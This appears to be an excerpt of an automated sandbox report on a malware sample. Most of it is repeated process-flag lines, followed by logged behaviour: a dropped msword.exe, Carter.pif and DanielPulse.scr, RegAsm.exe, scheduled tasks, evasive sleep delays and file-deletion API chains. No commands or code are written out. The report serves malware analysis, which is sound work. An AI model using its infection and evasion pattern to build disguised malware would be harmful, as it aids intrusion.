              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\tasklist.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\cmd.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\SysWOW64\schtasks.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\conhost.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wscript.exe; Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Process information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Memory allocated: 1330000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Memory allocated: 30A0000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Memory allocated: 2EA0000 memory reserve | memory write watch
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Thread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Thread delayed: delay time: 922337203685477
              Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3928
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 4872
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 2689
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 470
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 6256
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Window / User API: threadDelayed 3394
              Source: C:\Windows\SysWOW64\timeout.exe; Window / User API: threadDelayed 726
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Window / User API: threadDelayed 3117
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Window / User API: threadDelayed 1144
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; Window / User API: threadDelayed 8699
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; API coverage: 5.0 %
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; API coverage: 4.9 %
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7264; Thread sleep count: 3928 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7220; Thread sleep count: 4872 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7364; Thread sleep time: -21213755684765971s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392; Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1996; Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7416; Thread sleep time: -3689348814741908s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4040; Thread sleep count: 2689 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1848; Thread sleep count: 470 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4152; Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4936; Thread sleep time: -1844674407370954s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1736; Thread sleep time: -30000s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5040; Thread sleep time: -922337203685477s >= -30000s
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8468; Thread sleep count: 6256 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8472; Thread sleep count: 3394 > 30
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8500; Thread sleep time: -10145709240540247s >= -30000s
              Source: C:\Windows\SysWOW64\timeout.exe TID: 8908; Thread sleep count: 726 > 30
              Source: C:\Windows\SysWOW64\timeout.exe TID: 8908; Thread sleep time: -72600s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 9128; Thread sleep count: 3117 > 30
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif TID: 9128; Thread sleep time: -31170s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8752; Thread sleep time: -60000s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 8784; Thread sleep time: -24903104499507879s >= -30000s
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 7700; Thread sleep count: 1144 > 30
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe TID: 7700; Thread sleep count: 8699 > 30
              Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Last function: Thread delayed
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Thread sleep count: Count: 3117 delay: -10
              Source: C:\Users\user\AppData\Local\Temp\220239\RegAsm.exe; File Volume queried: C:\ FullSizeInformation
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe; Code function: 14_2_004062D5 FindFirstFileW,FindClose,14_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe; Code function: 14_2_00402E18 FindFirstFileW,14_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe; Code function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D4005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002D494A GetFileAttributesW,FindFirstFileW,FindClose,29_2_002D494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D3CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DC2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002DCD14 FindFirstFileW,FindClose,29_2_002DCD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,29_2_002DCD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF5D8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif; Code function: 29_2_002DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DFA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00944005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,37_2_0094494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,37_2_0094CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr; Code function: 37_2_0094CD14 FindFirstFileW,FindClose,37_2_0094CD14
